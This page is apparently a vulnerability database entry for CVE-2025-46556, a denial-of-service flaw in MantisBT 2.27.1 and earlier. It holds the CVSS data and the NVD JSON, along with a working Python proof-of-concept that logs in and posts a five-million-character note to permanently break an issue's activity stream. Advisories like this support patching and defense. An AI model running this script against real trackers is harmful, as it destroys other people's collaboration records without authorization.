Security Vulnerability Report
中文
CVE-2025-46556 CVSS 6.5 MEDIUM

CVE-2025-46556

Published: 2025-11-04 01:15:33
Last Modified: 2025-11-07 18:30:03
Source: [email protected]

Description

Mantis Bug Tracker (MantisBT) is an open source issue tracker. Versions 2.27.1 and below allow attackers to permanently corrupt issue activity logs by submitting extremely long notes (tested with 4,788,761 characters) due to a lack of server-side validation of note length. Once such a note is added, the activity stream UI fails to render; therefore, new notes cannot be displayed, effectively breaking all future collaboration on the issue. This issue is fixed in version 2.27.2.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:mantisbt:mantisbt:*:*:*:*:*:*:*:* - VULNERABLE
MantisBT < 2.27.2
MantisBT = 2.27.1
MantisBT = 2.27.0
MantisBT <= 2.26.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-46556 PoC - MantisBT超长备注拒绝服务攻击 # Target: MantisBT <= 2.27.1 def exploit(target_url, username, password, issue_id): """ Exploit for CVE-2025-46556 This PoC demonstrates how submitting an extremely long note can corrupt issue activity logs. """ login_url = f"{target_url}/login.php" bugnote_url = f"{target_url}/bugnote_add.php" # Create session session = requests.Session() # Login to MantisBT login_data = { "username": username, "password": password } resp = session.post(login_url, data=login_data) if "login" in resp.url.lower(): print("[-] Login failed") return False print("[+] Login successful") # Create extremely long note (4,788,761+ characters) # This will corrupt the activity log long_note = "A" * 5000000 # 5 million characters # Submit the long note note_data = { "bug_id": issue_id, "bugnote_text": long_note, "mode": "add" } resp = session.post(bugnote_url, data=note_data) if resp.status_code == 200: print(f"[+] Successfully submitted long note to issue {issue_id}") print("[-] Activity stream for this issue is now corrupted!") return True else: print(f"[-] Failed to submit note (status: {resp.status_code})") return False if __name__ == "__main__": if len(sys.argv) < 5: print(f"Usage: python {sys.argv[0]} <target_url> <username> <password> <issue_id>") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] issue = sys.argv[4] exploit(target, user, pwd, issue)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-46556", "sourceIdentifier": "[email protected]", "published": "2025-11-04T01:15:33.257", "lastModified": "2025-11-07T18:30:03.140", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Mantis Bug Tracker (MantisBT) is an open source issue tracker. Versions 2.27.1 and below allow attackers to permanently corrupt issue activity logs by submitting extremely long notes (tested with 4,788,761 characters) due to a lack of server-side validation of note length. Once such a note is added, the activity stream UI fails to render; therefore, new notes cannot be displayed, effectively breaking all future collaboration on the issue. This issue is fixed in version 2.27.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mantisbt:mantisbt:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.27.2", "matchCriteriaId": "B49EF21D-F412-4C89-BFA8-9606F204E310"}]}]}], "references": [{"url": "https://github.com/mantisbt/mantisbt/commit/c99a41272532ba49b5c8dccb7797afead9864234", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/mantisbt/mantisbt/commit/d5cec6bffb44d54bd412c186b9baa409b1aa4238", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/mantisbt/mantisbt/commit/e9119c68b4a0eaa0bbde3deb121e81f5f7157361", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/mantisbt/mantisbt/security/advisories/GHSA-r3jf-hm7q-qfw5", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.